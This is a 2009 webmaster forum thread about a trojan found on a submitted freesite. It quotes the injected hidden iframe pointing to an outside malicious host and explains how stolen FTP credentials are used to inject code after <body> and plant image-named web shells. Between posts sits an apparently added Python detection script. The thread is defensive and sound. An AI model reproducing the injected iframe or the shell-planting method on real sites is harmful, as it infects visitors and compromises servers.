Greenguy's Board
Greenguy's Board > Possible Cheaters
Old 2009-06-16, 11:28 AM   #1
hincapie
You can now put whatever you want in this space :)
Join Date: Aug 2005
Location: Cyprus
Posts: 963
Trojan on freesite

I was checking some freesites submitted to me - and this one made my trojan alerter go nuts: http://paintortures.com/16-06/

Take care
__________________
Hinc

Linklists/TGPs:
Adult List
Loasex.com
Old 2009-06-16, 03:38 PM   #2
Wazza
I'm a jaded evil bastard, I wouldn't piss on myself if I was on fire...
 
Join Date: Apr 2003
Location: Melbourne, Australia
Posts: 808
It is the main page that is the issue

Contains the following

Code:
iframe src="http://meldor[inserted to kill link]group.cn:8080/ts/in.cgi?pepsi67" width=125 height=125 style="visibility: hidden"
The wms ref code is

slavesinlove.com/cgi-bin/click.cgi?id=dejavu

I know I've seen dejavu before...
__________________
I sale Internet

My sites have no traffic and no PR - let's trade - PM me
Old 2009-06-16, 03:47 PM   #3
cd34
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
iframe after <body> -- ftp account was most likely compromised.
__________________
SnapReplay.com a different way to share photos - iPhone & Android
Old 2009-06-16, 04:00 PM   #4
Wazza
I'm a jaded evil bastard, I wouldn't piss on myself if I was on fire...
 
Join Date: Apr 2003
Location: Melbourne, Australia
Posts: 808
Odd that it's not on all html pages... the index is clean... but the main page, the one that is less likely to get scanned by a linkbot has the code...
__________________
I sale Internet

My sites have no traffic and no PR - let's trade - PM me
Old 2009-06-16, 09:11 PM   #5
nate
I can now put whatever you want in this space :)
Join Date: Mar 2009
Location: Merica!
Posts: 543
Quote:
ftp account was most likely compromised.
you say that a lot. why so?
__________________
Its just a jump to the left.
Old 2009-06-16, 09:56 PM   #6
cd34
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
Quote:
Originally Posted by nate View Post
you say that a lot. why so?
There are a few types of exploits that are out there. A web exploit or an FTP exploit are the two most common.

With the FTP exploit, a person's FTP user/password data is compromised and passed off to a cluster of machines. Those machines then go in with the FTP credentials and download every .html and .php file and replace <body> with <body><script exploit code> or <body><iframe exploit code>. Within a few hours, that cluster of servers will have modified as many pages as they can. Other machines in there will try to determine actual usable URLs and will inject remote shells that mimic existing files. You might have DSC003049.jpg in a directory and the exploit server might inject DSC003049.php. Those URLs are then cataloged for later attempts at spam & DDoS work.

Most web exploits don't modify dozens of files and usually just inject a script that allows remote access. Usually it is modification of a template or file so that they can later run remote shells or scripts, or, depending on the hole in the application, they may upload files into directories for later use. Not to say that they couldn't modify a number of files, it depends on how the server is set up.

If the host runs setuid or suexec, a compromised web script runs as the same userid as the FTP account and therefore all files can be modified. With FTP, you're almost guaranteed that every file you can see in FTP can be modified. From a return on investment standpoint, with an FTP account you are more likely to have more pages modified. More pages means more surfers potentially exploited which means more zombies/toolbars/etc.

However, the exploit listed above has about a 99% chance of being from an exploited FTP password.
__________________
SnapReplay.com a different way to share photos - iPhone & Android
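The two artefacts cd34 describes (a hidden iframe or external script dropped straight after <body>, and a .php file planted beside an image with the same name, e.g. DSC003049.jpg / DSC003049.php) can both be checked for mechanically. The script below is an added example written for this thread, not code from any poster; the sample pages and file listing are constructed here, and the `example.invalid` host stands in for whatever the injected tag really points at. It flags the pattern Wazza quoted in post #2 and the shadow-file trick from the post above.

```python
"""Scan a site's HTML and file listing for the FTP-compromise injection
pattern: a hidden <iframe> / external <script> right after <body>, and a
.php file that mimics an image filename in the same directory."""
import re
from pathlib import PurePosixPath

# The injected tag is placed immediately after <body>, which is what makes
# it cheap to detect: legitimate markup rarely starts with a hidden iframe.
AFTER_BODY_RE = re.compile(r"<body[^>]*>\s*<(iframe|script)\b([^>]*)>", re.IGNORECASE)
HIDDEN_RE = re.compile(
    r"visibility\s*:\s*hidden|display\s*:\s*none|(?:width|height)\s*=\s*[\"']?0\b",
    re.IGNORECASE,
)
SRC_RE = re.compile(r"\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)
IMAGE_EXT = {".jpg", ".jpeg", ".gif", ".png"}


def find_injected_tag(html):
    """Return (tag, src) for a suspicious tag right after <body>, else None.

    An iframe counts only if it is styled hidden; a script counts only if it
    loads from an external src. Inline scripts are ignored to keep false
    positives down on ordinary pages.
    """
    m = AFTER_BODY_RE.search(html)
    if not m:
        return None
    tag, attrs = m.group(1).lower(), m.group(2)
    src_match = SRC_RE.search(attrs)
    src = src_match.group(1) if src_match else None
    if tag == "iframe" and HIDDEN_RE.search(attrs):
        return ("iframe", src or "")
    if tag == "script" and src and src.lower().startswith(("http://", "https://", "//")):
        return ("script", src)
    return None


def find_shadow_scripts(filenames):
    """Return .php paths whose stem matches an image in the same directory."""
    by_dir = {}
    for name in filenames:
        p = PurePosixPath(name)
        by_dir.setdefault(str(p.parent), []).append(p)
    hits = []
    for paths in by_dir.values():
        image_stems = {p.stem for p in paths if p.suffix.lower() in IMAGE_EXT}
        hits.extend(
            str(p) for p in paths
            if p.suffix.lower() == ".php" and p.stem in image_stems
        )
    return sorted(hits)


def scan_site(pages, listing):
    """Run both checks over a {path: html} mapping and a flat file listing."""
    injected = {}
    for path, html in pages.items():
        hit = find_injected_tag(html)
        if hit:
            injected[path] = hit
    return {"injected": injected, "shadow_scripts": find_shadow_scripts(listing)}


# Constructed sample site (not the real one from the thread): the index is
# clean, main.html carries a hidden iframe after <body>, news.html an external
# script, and an image in pics/ has a .php twin.
SAMPLE_PAGES = {
    "index.html": "<html><body>\n<h1>Welcome</h1></body></html>",
    "main.html": (
        '<html><body><iframe src="http://example.invalid/ts/in.cgi?x" '
        'width=125 height=125 style="visibility: hidden"></iframe>\n'
        "<h1>Main</h1></body></html>"
    ),
    "news.html": '<html><body><script src="http://example.invalid/x.js"></script><p></p></body></html>',
    "gallery.html": '<html><body><iframe src="embed.html" width=600 height=400></iframe></body></html>',
    "blog.html": "<html><body><script>var a = 1;</script><p>hi</p></body></html>",
}
SAMPLE_LISTING = [
    "pics/DSC003049.jpg", "pics/DSC003049.php", "pics/DSC003050.jpg",
    "index.php", "index.html", "main.html",
]

if __name__ == "__main__":
    print(scan_site(SAMPLE_PAGES, SAMPLE_LISTING))
```

Running the scan over a real site means feeding it the HTML files and a recursive file listing pulled over the same FTP account, which is also the moment to rotate that password: as the post above notes, the injection reaches every file the credentials can see, so a clean index page says nothing about the rest.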
Old 2009-06-17, 12:04 PM   #7
dejavu
Internet! Is that thing still around?
 
Join Date: Aug 2008
Posts: 3
Hello 2all!
Thanks for the alert, this is really a trojan on my server!
I have deleted it from this page and changed the FTP information...
I will now find this code on the other pages too and clean it up
Thanks
Old 2009-06-17, 03:12 PM   #8
dejavu
Internet! Is that thing still around?
 
Join Date: Aug 2008
Posts: 3
All fixed and iframes removed from the server.
Thanks again...
Old 2009-06-18, 01:15 PM   #9
stuveltje
Live and learn. And take very careful notes!
Join Date: Apr 2003
Location: Sunny Holland
Posts: 6,157
Ah, so that was a trojan? My computer froze when I was checking your site on the main page, dejavu.. nothing further happened, the page froze, I could close it and go further without rebooting, seems I finally have the right stuff to protect myself. Oh and yeah, it was a reason to reject your site, but I didn't blacklist it
All times are GMT -4.